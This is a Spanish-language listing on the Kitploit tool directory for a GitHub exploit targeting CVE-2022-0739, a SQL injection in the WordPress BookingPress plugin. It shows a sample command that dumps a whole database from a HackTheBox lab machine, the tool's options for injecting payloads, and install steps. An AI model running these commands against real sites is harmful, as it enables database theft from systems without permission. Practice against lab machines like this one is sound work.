Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2022-0739 — Exploit para WP BookingPress (< 1.0.11) basado en el POC de destr4ct. | Kitploit
Herramientas/GitHubGitHub/viardant/cve-2022-0739
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHubviardant/cve-2022-0739

CVE-2022-0739

Exploit para WP BookingPress (< 1.0.11) basado en el POC de destr4ct.

Ver Repositorio
4hace 3 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2022-0739

Mi versión del exploit de BookingPress para CVE-2022-0739, basado en el POC de destr4ct — solo que más bonito.

Ejemplo

Ejemplo de uso contra la máquina MetaTwo de HackTheBox, que aloja un WordPress con el plugin bookingpress vulnerable (versión 1.0.10).

root@kitploit:~
python booking-sqlinjector.py -u http://metapress.htb -nu http://metapress.htb/events/ -a -o db_dump

asciicast

Uso

root@kitploit:~
usage: booking-sqlinjector.py [-h] -u URL [-o BASENAME] [-p PAYLOAD] [-a] [-v] (-n NONCE | -nu NONCE_URL)

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     URL of WordPress server with vulnerable plugin (http://example.domain)
  -o BASENAME, --out BASENAME
                        Output database schema and dump in JSON format
  -p PAYLOAD, --payload PAYLOAD
                        Payload to inject. Should start with ')'
  -a, --dump-all        Enables whole DB dump
  -v, --verbose         Enables verbose mode
  -n NONCE, --nonce NONCE
                        Nonce that you got as unauthenticated user
  -nu NONCE_URL, --nonce-url NONCE_URL
                        URL where nonce can be extracted (bookingprss form page)

Instalación

root@kitploit:~
git clone https://github.com/viardant/CVE-2022-0739
cd CVE-2022-0739
pip install -r requirements.txt

Descargo de responsabilidad

TL:DR; Solo con fines educativos, no rompas cosas que no te pertenecen o para las que no tengas permiso de pentest. Si usas este programa para fines nefastos, los dioses de la ciberseguridad podrían golpear tu computadora con un malware tan devastador que desearías haber comprado una Mac.

Descargar herramienta